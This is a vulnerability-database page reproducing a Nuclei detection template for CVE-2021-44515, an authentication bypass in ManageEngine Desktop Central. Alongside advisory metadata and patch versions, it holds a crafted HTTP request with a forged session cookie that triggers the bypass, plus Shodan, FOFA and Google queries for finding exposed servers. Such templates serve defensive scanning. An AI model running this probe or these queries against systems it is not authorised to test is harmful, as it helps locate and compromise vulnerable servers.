Zoho ManageEngine Desktop Central - Remote Code Execution vulnerabilit
Reporter | Title | Published | Views | Family All 25 |
---|---|---|---|---|
![]() | CVE-2021-44515 | 12 Dec 202105:15 | – | nvd |
![]() | CVE-2022-48362 | 25 Feb 202321:15 | – | nvd |
![]() | CVE-2021-44515 | 12 Dec 202104:04 | – | vulnrichment |
![]() | CVE-2021-44515 | 12 Dec 202104:04 | – | cvelist |
![]() | CVE-2022-48362 | 25 Feb 202300:00 | – | cvelist |
![]() | Zoho ManageEngine Desktop Central Authentication Bypass (CVE-2021-44515) | 16 Mar 202200:00 | – | checkpoint_advisories |
![]() | ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515) | 6 Dec 202100:00 | – | nessus |
![]() | Zoho ManageEngine Desktop Central MSP Licensing Issue Vulnerability | 9 Dec 202100:00 | – | cnvd |
![]() | CVE-2021-44515 | 21 Jan 202200:00 | – | attackerkb |
![]() | CVE-2021-44515 | 12 Dec 202105:15 | – | cve |
id: CVE-2021-44515
info:
name: Zoho ManageEngine Desktop Central - Remote Code Execution
author: Adam Crosser
severity: critical
description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
reference:
- https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
- https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html
- https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
- https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
- https://nvd.nist.gov/vuln/detail/CVE-2021-44515
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-44515
cwe-id: CWE-287
epss-score: 0.97233
epss-percentile: 0.99811
cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:*
metadata:
max-request: 1
vendor: zohocorp
product: manageengine_desktop_central
shodan-query: http.title:"manageengine desktop central 10"
fofa-query:
- title="manageengine desktop central 10"
- app="zoho-manageengine-desktop"
google-query: intitle:"manageengine desktop central 10"
tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp
http:
- raw:
- |
GET /STATE_ID/123/agentLogUploader HTTP/1.1
Host: {{Hostname}}
Cookie: STATE_COOKIE=&_REQS/_TIME/123
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(body) == 0"
- type: word
part: header
words:
- "UEMJSESSIONID="
- type: status
status:
- 200
# digest: 4a0a004730450221008ef1c5493af34ed72673fd6a1700312f319d704d03ec24a76fa4110b476d39ba02200603382c6d9557df078e327a7e0406d270a78289c3a1b8aa3f40e22b0d1cb167:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo